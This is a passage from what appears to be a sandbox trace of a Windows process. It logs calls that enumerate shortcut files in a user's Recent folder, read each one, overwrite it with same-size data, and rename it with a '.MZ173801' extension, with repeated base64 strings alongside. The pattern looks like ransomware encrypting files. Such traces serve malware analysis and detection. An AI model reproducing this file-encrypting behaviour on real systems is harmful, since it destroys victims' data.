SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.683] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x485, lpOverlapped=0x0) returned 1 [0109.684] CloseHandle (hObject=0x3f4) returned 1 [0109.684] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MRdmd02KMM5JtOIVQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mrdmd02kmm5jtoivq.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.685] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x485, lpOverlapped=0x0) returned 1 [0109.686] CloseHandle (hObject=0x3f4) returned 1 [0109.687] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MRdmd02KMM5JtOIVQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mrdmd02kmm5jtoivq.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\MRdmd02KMM5JtOIVQ.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\mrdmd02kmm5jtoivq.lnk.mz173801")) returned 1 [0109.687] GetCurrentThreadId () returned 0x1358 [0109.687] GetCurrentThreadId () returned 0x1358 [0109.687] GetCurrentThreadId () returned 0x1358 [0109.687] GetCurrentThreadId () returned 0x1358 [0109.688] GetCurrentThreadId () returned 0x1358 [0109.688] GetCurrentThreadId () returned 0x1358 [0109.688] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70aaa9be, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75a70d20, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75a70d20, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Music.lnk", cAlternateFileName="")) returned 1 [0109.688] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.688] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.688] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Music.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\music.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70aaa9be, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75a70d20, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75a70d20, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2de)) returned 1 [0109.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.689] GetCurrentThreadId () returned 0x1358 [0109.689] GetCurrentThreadId () returned 0x1358 [0109.689] GetCurrentThreadId () returned 0x1358 [0109.689] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.689] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.689] GetCurrentThreadId () returned 0x1358 [0109.689] GetCurrentThreadId () returned 0x1358 [0109.689] GetCurrentThreadId () returned 0x1358 [0109.689] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Music.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\music.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.689] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.690] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.690] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2de [0109.690] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.690] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2de, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x2de, lpOverlapped=0x0) returned 1 [0109.690] CloseHandle (hObject=0x3f4) returned 1 [0109.691] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Music.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\music.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.691] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x2de, lpOverlapped=0x0) returned 1 [0109.692] CloseHandle (hObject=0x3f4) returned 1 [0109.693] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Music.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\music.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Music.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\music.lnk.mz173801")) returned 1 [0109.693] GetCurrentThreadId () returned 0x1358 [0109.693] GetCurrentThreadId () returned 0x1358 [0109.693] GetCurrentThreadId () returned 0x1358 [0109.693] GetCurrentThreadId () returned 0x1358 [0109.694] GetCurrentThreadId () returned 0x1358 [0109.694] GetCurrentThreadId () returned 0x1358 [0109.694] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7612940b, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7612940b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7612940b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4bf, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="N68wVE30d.lnk", cAlternateFileName="N68WVE~1.LNK")) returned 1 [0109.694] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.694] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.694] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\N68wVE30d.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\n68wve30d.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7612940b, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7612940b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7612940b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4bf)) returned 1 [0109.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.694] GetCurrentThreadId () returned 0x1358 [0109.694] GetCurrentThreadId () returned 0x1358 [0109.694] GetCurrentThreadId () returned 0x1358 [0109.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 